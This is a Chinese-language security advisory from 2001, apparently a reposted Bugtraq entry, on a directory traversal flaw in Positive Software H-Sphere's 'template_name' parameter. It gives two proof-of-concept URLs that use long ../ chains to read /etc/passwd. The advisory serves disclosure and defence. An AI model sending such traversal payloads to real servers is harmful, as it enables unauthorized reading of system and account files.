发布日期：2001-09-25
更新日期：2001-09-28

受影响系统：

Positive Software H-Sphere 1.5
   - Apache Group Apache 1.3.9
   - Microsoft IIS 5.0
Positive Software H-Sphere 2.06
   - Apache Group Apache 1.3.9
   - Microsoft IIS 5.0
Positive Software H-Sphere 2.05
   - Apache Group Apache 1.3.9
   - Microsoft IIS 5.0
Positive Software H-Sphere 2.0
   - Apache Group Apache 1.3.9
   - Microsoft IIS 5.0

描述：

---

BUGTRAQ ID : 3359

H-Sphere是一种提供了跨多台服务器的网站自动化的软件，支持多种操作系统和Web服
务器软件。

由于其中“template_name”变量没有过滤“../”，可能导致系统文件的泄露，要利用
这个漏洞，攻击者必须得有一个访问该站点的帐号。

<*来源：Crazy Einstein （crazy_einstein@yahoo.com）*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Crazy Einstein （crazy_einstein@yahoo.com）提供了如下测试代码
：

http://www.target.com/some-path/psoft.hsphere.CP/some-path/template_name=../
../../../../../../../../../../../etc/passwd

http://www.target.com/shiva/psoft.hsphere.CP/admin/2628_0/template_name=../.
./../../../../../../../../../../etc/passwd


建议：

---

厂商补丁：

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本：
http://www.psoft.net/


浏览次数：4088
严重程度：0（网友投票）